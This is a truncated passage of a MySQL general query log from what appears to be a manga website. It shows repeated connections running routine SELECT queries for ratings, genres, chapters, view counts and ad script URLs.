'270' order by created desc 330653163 Quit 330653164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330653164 Quit 330653165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330653165 Quit 330653166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330653166 Quit 330653167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330653167 Quit 330653168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330653168 Quit 330653169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330653169 Quit 330653170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330653170 Quit 330653171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330653171 Quit 330653172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330653172 Quit 330653173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330653173 Quit 330653174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330653174 Quit 330653175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330653175 Quit 330653176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330653176 Quit 330653177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330653177 Quit 330653178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330653178 Quit 330653179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330653179 Quit 330653180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330653180 Quit 330653181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330653181 Quit 330653182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330653182 Quit 330653183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330653183 Quit 330653184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330653184 Quit 330653185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330653185 Quit 330653186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330653186 Quit 330653187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330653187 Quit 330653188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330653188 Quit 330653189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330653189 Quit 330653190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330653190 Quit 330653191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330653191 Quit 330653192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330653192 Quit 330653193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330653193 Quit 330653194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330653194 Quit 330653195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330653195 Quit 330653196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330653196 Quit 330653197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330653197 Quit 330653198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330653198 Quit 330653199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330653199 Quit 330653200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330653200 Quit 330653201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330653201 Quit 330653202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330653202 Quit 330653203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330653203 Quit 330653204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330653204 Quit 330653205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330653205 Quit 330653206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330653206 Quit 330653207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330653207 Quit 330653208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330653208 Quit 330653209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330653209 Quit 330653210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330653210 Quit 330653211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330653211 Quit 330653212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330653212 Quit 330653213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330653213 Quit 330653214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330653214 Quit 330653215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330653215 Quit 330653216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330653216 Quit 330653217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330653217 Quit 330653218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330653218 Quit 330653219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330653219 Quit 330653220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330653220 Quit 330653221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330653221 Quit 330653222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330653222 Quit 330653223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330653223 Quit 330653224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330653224 Quit 330653225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330653225 Quit 330653226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330653226 Quit 330653227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330653227 Quit 330653228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330653228 Quit 330653229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330653229 Quit 330653230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330653230 Quit 330653231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330653231 Quit 330653232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330653232 Quit 330653233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330653233 Quit 330653234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330653234 Quit 330653235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330653235 Quit 330653236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330653236 Quit 330653237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330653237 Quit 330653238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330653238 Quit 330653239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330653239 Quit 330653240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330653240 Quit 330653241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330653241 Quit 330653242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330653242 Quit 330653243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330653243 Quit 330653244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330653244 Quit 330653245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330653245 Quit 330653246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330653246 Quit 330653247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330653247 Quit 330653248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330653248 Quit 330653249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330653249 Quit 330653250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330653250 Quit 330653251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330653251 Quit 330653252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330653252 Quit 330653253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330653253 Quit 330653254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330653254 Quit 330653255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330653255 Quit 330653256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330653256 Quit 330653257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330653257 Quit 330653258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330653258 Quit 330653259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330653259 Quit 330653260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330653260 Quit 330653261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330653261 Quit 330653262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330653262 Quit 330653263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330653263 Quit 330653264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330653264 Quit 330653265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330653265 Quit 330653266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330653266 Quit 330653267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330653267 Quit 330653268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330653268 Quit 330653269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330653269 Quit 330653270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330653270 Quit 330653271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330653271 Quit 330653272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330653272 Quit 330653273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330653273 Quit 330653274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330653274 Quit 330653275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330653275 Quit 330653276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330653276 Quit 330652915 Quit 330653277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653277 Quit 330653278 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330653278 Quit 330653279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653279 Quit 330653280 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653280 Quit 330653281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653281 Quit 330653282 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653282 Quit 330653283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653283 Quit 330653284 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653284 Quit 330652917 Quit 330653285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653285 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330653014 Quit 330653286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653286 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '338' and m.active = 1 330653286 Quit 330653287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653287 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='338' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Gyaru%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330653285 Quit 330653288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653288 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330653288 Quit 330653289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653289 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id AND m.status = 'Finished') group by r.manga_id) as k ORDER BY k.id DESC 330652928 Quit 330653290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653290 Quit 330653291 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330653291 Quit 330653292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653292 Quit 330653293 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653293 Quit 330653294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653294 Quit 330653295 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653295 Quit 330653296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653296 Quit 330653297 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653297 Quit 330653298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653298 Quit 330653299 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'kono-kaisha-ni-suki-na-hito-ga-imasu' 330653299 Quit 330653300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653300 Query select * FROM chapters where manga_id = '121' order by id desc 330653300 Quit 330653301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653301 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '121' and m.active = 1 330653301 Quit 330653302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653302 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='121' and m.active = 1 AND (genres like '%Office%' OR genres like '%Romance%' OR genres like '%Seinen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330653289 Quit 330653303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653303 Quit 330653304 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330653304 Quit 330653305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330653305 Quit 330653306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330653306 Quit 330653307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330653307 Quit 330653308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330653308 Quit 330653309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330653309 Quit 330653310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330653310 Quit 330653311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653311 Query select count(id) as total_rating, 